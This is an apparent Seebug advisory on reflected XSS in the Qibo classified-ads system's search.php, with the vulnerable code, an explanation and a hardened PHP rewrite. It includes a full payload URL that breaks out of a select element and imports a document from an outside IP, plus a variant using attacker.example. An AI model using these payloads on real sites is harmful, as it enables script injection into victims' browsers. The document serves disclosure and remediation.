Qibo (齐博) Classified Information System, latest version: reflected XSS (bypasses Chrome XSS Auditor)

2014-12-16T00:00:00
ID SSV:94183
Type seebug
Reporter Root
Modified 2014-12-16T00:00:00

Description

Brief description:

An attacker-controllable global variable is concatenated into HTML without filtering, giving reflected XSS.

Detailed description:

/search.php

$module_select = "<select name='mid' onChange=\"window.location.href='?mid='+this.options[this.selectedIndex].value\"><option value='0' style='color:#aaa;'>所有模型 </option>";
// $module_db is populated from the request by Qibo's global-variable mechanism;
// $key and $value are written into the HTML without any escaping.
foreach($module_db AS $key=>$value){
    $ckk = $mid==$key ? ' selected ' : ' ';
    $module_select .= "<option value='$key' $ckk>$value</option>";
}
$module_select .= "</select>";
if($mid){
    $SQL = " AND mid='$mid' ";

Because Qibo's request-to-global-variable mechanism lets request parameters populate $module_db, an attacker can supply the array via the query string; its values are concatenated straight into the HTML without escaping, which gives reflected XSS. The payload first emits </option></select> to close the form control, so the remainder is parsed as ordinary markup, and a trailing <!-- swallows the rest of the page's HTML. Chrome's XSS Auditor did not block an HTML Import (<link rel=import href=...>) that pulls in an attacker-hosted document, so this form of the payload bypasses the filter. Note that HTML Imports were removed from Chrome in version 80 and the XSS Auditor itself in version 78, so this particular bypass no longer applies to current browsers; the injection itself does not depend on it. Payload: http://10.211.55.3/fenlei/search.php?module_db[]=%3C/option%3E%3C/select%3E%3Clink%20rel=import%20href=http://103.224.80.59/2.php%3E%3C!--
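The following is an added example, not Qibo's own code: it reproduces the vulnerable <select> builder from /search.php next to a hardened version and runs both against the injected value from the payload above. The trusted model list, the $_GET contents and the attacker host attacker.example are constructed for the example.

```php
<?php
// Added example (not from Qibo): vulnerable vs. hardened <select> builder.

// Constructed stand-in for the model list Qibo would load from its own
// configuration rather than from the request.
$trusted_models = [1 => 'Housing', 2 => 'Jobs', 3 => 'Services'];

// Vulnerable builder: $module_db and $mid come straight from the request and
// are interpolated into HTML without escaping, as in the snippet above.
function build_select_vulnerable(array $module_db, $mid): string {
    $html = "<select name='mid'><option value='0'>All models</option>";
    foreach ($module_db as $key => $value) {
        $ckk = ($mid == $key) ? ' selected ' : ' ';
        $html .= "<option value='$key' $ckk>$value</option>";
    }
    return $html . "</select>";
}

// Hardened builder: takes the model list from trusted configuration only,
// escapes every value placed into HTML, and coerces mid to an integer
// before it is compared (or, later in search.php, interpolated into SQL).
function build_select_safe(array $models, $mid): string {
    $mid = (int)$mid;
    $html = "<select name='mid'><option value='0'>All models</option>";
    foreach ($models as $key => $value) {
        $key = (int)$key;
        $sel = ($mid === $key) ? ' selected' : '';
        $html .= "<option value='" . $key . "'" . $sel . ">"
               . htmlspecialchars((string)$value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
               . "</option>";
    }
    return $html . "</select>";
}

// Constructed request, simulating what Qibo's global-variable mechanism
// produces from ?module_db[]=...&mid=0 (attacker host is hypothetical).
$_GET = [
    'module_db' => ["</option></select><link rel=import href=http://attacker.example/2.php><!--"],
    'mid'       => '0',
];

echo "Vulnerable output:\n";
echo build_select_vulnerable($_GET['module_db'], $_GET['mid']), "\n\n";
// The injected </option></select> closes the control; <link rel=import ...>
// is then parsed as live markup and <!-- comments out the rest of the page.

echo "Hardened output (request-supplied module_db ignored):\n";
echo build_select_safe($trusted_models, $_GET['mid']), "\n\n";

echo "Hardened output even if the tainted list reached the builder:\n";
echo build_select_safe([1 => $_GET['module_db'][0]], '1'), "\n";
// '<' and '>' become &lt; and &gt;, so the value stays inside the <option> text.
```

Run it with `php example.php`. The two defences are independent: sourcing the list from configuration removes the attacker's control over $module_db entirely, and escaping at the point of output (with ENT_QUOTES, because the attribute values are single-quoted) protects any other value that still reaches the HTML.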

Proof of vulnerability:

Screenshot 1.png: https://images.seebug.org/upload/201412/101604193eeda512bb08bb5821694ec20c4d68f6.png